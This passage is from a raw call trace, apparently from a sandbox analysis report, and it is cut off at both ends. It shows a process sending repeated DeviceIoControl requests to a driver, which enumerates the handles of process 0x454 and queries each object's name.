nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0141.619] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.619] PsAcquireProcessExitSynchronization () returned 0x0 [0141.619] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.619] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036cf730, HandleInformation=0x0) returned 0x0 [0141.619] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.619] PsReleaseProcessExitSynchronization () returned 0x2 [0141.619] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.619] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80026a57c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80026a57c4, ReturnLength=0xfffff88005163508) returned 0x0 [0141.619] ObfDereferenceObject (Object=0xfffffa80036cf730) returned 0x1 [0141.619] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.619] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.619] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.619] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x102, lpOverlapped=0x0) returned 1 [0141.619] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.619] PsAcquireProcessExitSynchronization () returned 0x0 [0141.619] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.619] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003705070, HandleInformation=0x0) returned 0x0 [0141.620] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.620] PsReleaseProcessExitSynchronization () returned 0x2 [0141.620] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.620] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fc8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fc8044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.620] ObfDereferenceObject (Object=0xfffffa8003705070) returned 0x1 [0141.620] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.620] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.620] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.620] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0141.620] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.620] PsAcquireProcessExitSynchronization () returned 0x0 [0141.620] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.620] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0141.620] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.620] PsReleaseProcessExitSynchronization () returned 0x2 [0141.620] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.621] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa8002fa0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa0044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.621] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xd [0141.621] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.621] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.621] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.621] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0141.621] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.621] PsAcquireProcessExitSynchronization () returned 0x0 [0141.621] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.621] ObReferenceObjectByHandle (in: Handle=0x114, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0141.621] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.621] PsReleaseProcessExitSynchronization () returned 0x2 [0141.621] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.621] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002456044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002456044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.621] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0141.621] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.622] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.622] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.622] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0141.622] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.622] PsAcquireProcessExitSynchronization () returned 0x0 [0141.622] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.622] ObReferenceObjectByHandle (in: Handle=0x13c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037252d0, HandleInformation=0x0) returned 0x0 [0141.622] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.622] PsReleaseProcessExitSynchronization () returned 0x2 [0141.622] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.622] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002f21044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f21044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.622] ObfDereferenceObject (Object=0xfffffa80037252d0) returned 0x1 [0141.622] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.622] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.622] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.622] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0141.622] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.622] PsAcquireProcessExitSynchronization () returned 0x0 [0141.622] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.622] ObReferenceObjectByHandle (in: Handle=0x144, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037201f0, HandleInformation=0x0) returned 0x0 [0141.622] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.623] PsReleaseProcessExitSynchronization () returned 0x2 [0141.623] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.623] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fc2044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fc2044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.623] ObfDereferenceObject (Object=0xfffffa80037201f0) returned 0x1 [0141.623] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.623] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.623] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.623] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0141.623] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.623] PsAcquireProcessExitSynchronization () returned 0x0 [0141.623] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.623] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0141.623] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.623] PsReleaseProcessExitSynchronization () returned 0x2 [0141.623] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.623] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002fc3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fc3044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.623] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0141.623] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.623] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.623] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.623] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0141.624] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.624] PsAcquireProcessExitSynchronization () returned 0x0 [0141.624] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.624] ObReferenceObjectByHandle (in: Handle=0x168, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0141.624] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.624] PsReleaseProcessExitSynchronization () returned 0x2 [0141.624] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.624] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002fc4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fc4044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.624] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0141.624] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.624] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.624] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.624] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0141.624] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.624] PsAcquireProcessExitSynchronization () returned 0x0 [0141.624] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.624] ObReferenceObjectByHandle (in: Handle=0x16c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003721490, HandleInformation=0x0) returned 0x0 [0141.624] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.624] PsReleaseProcessExitSynchronization () returned 0x2 [0141.624] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.624] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fc5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fc5044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.624] ObfDereferenceObject (Object=0xfffffa8003721490) returned 0x1 [0141.624] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.624] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.625] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.625] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0141.625] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.625] PsAcquireProcessExitSynchronization () returned 0x0 [0141.625] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.625] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800371d5e0, HandleInformation=0x0) returned 0x0 [0141.625] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.625] PsReleaseProcessExitSynchronization () returned 0x2 [0141.625] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.625] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fc7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fc7044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.625] ObfDereferenceObject (Object=0xfffffa800371d5e0) returned 0x1 [0141.625] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.625] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.625] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.625] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0141.625] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.625] PsAcquireProcessExitSynchronization () returned 0x0 [0141.625] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.625] ObReferenceObjectByHandle (in: Handle=0x178, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003712730, HandleInformation=0x0) returned 0x0 [0141.625] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.625] PsReleaseProcessExitSynchronization () returned 0x2 [0141.625] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.625] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa1044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.626] ObfDereferenceObject (Object=0xfffffa8003712730) returned 0x1 [0141.626] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.626] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.626] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.626] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0141.626] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.626] PsAcquireProcessExitSynchronization () returned 0x0 [0141.626] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.626] ObReferenceObjectByHandle (in: Handle=0x18c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003744410, HandleInformation=0x0) returned 0x0 [0141.626] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.626] PsReleaseProcessExitSynchronization () returned 0x2 [0141.626] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.626] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa2044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa2044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.626] ObfDereferenceObject (Object=0xfffffa8003744410) returned 0x1 [0141.626] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.626] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.626] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.626] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0141.626] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.626] PsAcquireProcessExitSynchronization () returned 0x0 [0141.626] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.626] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037375e0, HandleInformation=0x0) returned 0x0 [0141.627] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.627] PsReleaseProcessExitSynchronization () returned 0x2 [0141.627] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.627] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa3044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa3044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.627] ObfDereferenceObject (Object=0xfffffa80037375e0) returned 0x1 [0141.627] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.627] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.627] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.627] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0141.627] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.627] PsAcquireProcessExitSynchronization () returned 0x0 [0141.627] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.627] ObReferenceObjectByHandle (in: Handle=0x20c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037705e0, HandleInformation=0x0) returned 0x0 [0141.628] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.628] PsReleaseProcessExitSynchronization () returned 0x2 [0141.628] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.628] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa4044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.628] ObfDereferenceObject (Object=0xfffffa80037705e0) returned 0x1 [0141.628] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.628] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.628] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.628] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0141.628] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.628] PsAcquireProcessExitSynchronization () returned 0x0 [0141.628] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.628] ObReferenceObjectByHandle (in: Handle=0x278, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037ba730, HandleInformation=0x0) returned 0x0 [0141.628] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.628] PsReleaseProcessExitSynchronization () returned 0x2 [0141.628] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.628] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa5044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.628] ObfDereferenceObject (Object=0xfffffa80037ba730) returned 0x1 [0141.628] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.629] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.629] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.629] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0141.629] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.629] PsAcquireProcessExitSynchronization () returned 0x0 [0141.629] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.629] ObReferenceObjectByHandle (in: Handle=0x298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037b6730, HandleInformation=0x0) returned 0x0 [0141.629] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.629] 